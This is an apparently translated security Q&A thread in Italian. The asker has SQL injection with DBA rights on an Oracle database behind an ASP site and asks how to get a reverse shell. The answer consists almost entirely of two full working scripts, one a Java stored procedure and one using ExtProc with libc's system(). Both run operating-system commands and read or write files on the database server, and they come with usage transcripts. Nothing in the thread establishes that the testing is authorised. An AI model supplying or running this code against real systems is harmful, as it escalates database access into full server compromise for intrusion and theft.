Oracle Sql Injection Shell inverso [chiuso]

Question

Oracle Sql Injection Shell inverso [chiuso]

#1 da (3 voti)

1

Sto testando SQL Injection su un sito Web che utilizza il codice ASP. Posso ottenere con successo tutti i database e le tabelle. L'utente corrente ha i privilegi DBA. Mi chiedo come posso ottenere una shell inversa usando questa iniezione SQL. La versione Oracle è "Oracle Database 11g Enterprise Edition versione 11.1.0.7.0"

sql-injection oracle sqlmap

posta user1968957 02.08.2015 - 17:50

fonte

1 risposta

Leggi altre domande sui tag sql-injection oracle sqlmap

Utilizzo dell'indice di caratteri in una domanda di sicurezza [duplicato] Perché il bruto forzare la chiave privata DH è più difficile del calcolo della chiave pubblica?

score 3 · Answer 1

Puoi provare questo due modi di eseguire codice su Oracle DBMS.

Il primo è con codice Java: link

-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r--   1 oracle   system        45 Nov 22 12:20 mytest
-- -rw-r--r--   1 oracle   system      1645 Nov 22 12:20 aaa
-- -rw-r--r--   1 oracle   system      8267 Nov 22 12:20 bbb
-- [...]
--

create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
public class oraexec
{
    /*
     * Command execution module
     */
    public static void execCommand(String command) throws IOException
    {
        Runtime.getRuntime().exec(command);
    }

    /*
     * File reading module
     */
    public static void readFile(String filename) throws IOException
    {
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            System.out.println(text);
            text = fr.readLine();
        }
        fr.close();
    }

    /*
     * File writing module
     */
    public static void writeFile(String filename, String line) throws IOException
    {
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);
        fw.write(line);
        fw.write("\n");
        fw.close();
    }
}
/

-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java           
name 'oraexec.execCommand(java.lang.String)';
/

-- usage: exec dbms_java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';
/

-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';
/

Il secondo sta usando ExtProc: link

-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
    procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell32
    language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
    procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell64
    language c;
end oracmd64;
/